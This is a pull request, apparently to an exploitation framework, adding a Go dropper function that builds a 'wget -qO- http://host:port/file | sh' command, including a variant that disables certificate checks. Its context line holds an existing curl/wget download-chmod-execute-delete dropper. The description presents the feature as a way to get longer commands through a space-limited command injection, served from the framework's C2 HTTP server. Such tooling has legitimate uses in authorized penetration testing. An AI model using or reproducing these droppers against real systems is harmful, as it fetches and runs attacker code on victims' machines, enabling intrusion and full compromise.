### PR TITLE
add small wget to bash exec payload

### DIFF
--- a/payload/dropper/unix.go
+++ b/payload/dropper/unix.go
@@ -32,3 +32,14 @@ func (unix *UnixPayload) EitherHTTP(lhost string, lport int, ssl bool, downloadF
 	return fmt.Sprintf("(curl -kso %s http://%s || wget -O %s http://%s) && chmod +x %s && %s & rm -f %s",
 		output, uri, output, uri, output, output, output)
 }
+
+// Download a remote bash script with wget and pipe it to bash.
+func (unix *UnixPayload) WgetHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
+	uri := fmt.Sprintf("%s:%d/%s", lhost, lport, downloadFile)
+
+	if ssl {
+		return fmt.Sprintf("wget --no-check-certificate -qO- https://%s | sh", uri)
+	}
+
+	return fmt.Sprintf("wget -qO- http://%s | sh", uri)
+}


### PR DESCRIPTION
This small wget payload is useful when a command injection has limited space but you want the flexibility of executing longer commands. It's intended to be used to HTTPServeShell like this:

```golang
case c2.HTTPServeShell:
    // pipe a bash script straight to bash via wget
    generated = dropper.Unix.WgetHTTP(httpservefile.GetInstance().HTTPAddr,
        httpservefile.GetInstance().HTTPPort, httpservefile.GetInstance().TLS,
        httpservefile.GetInstance().GetRandomName(""))
```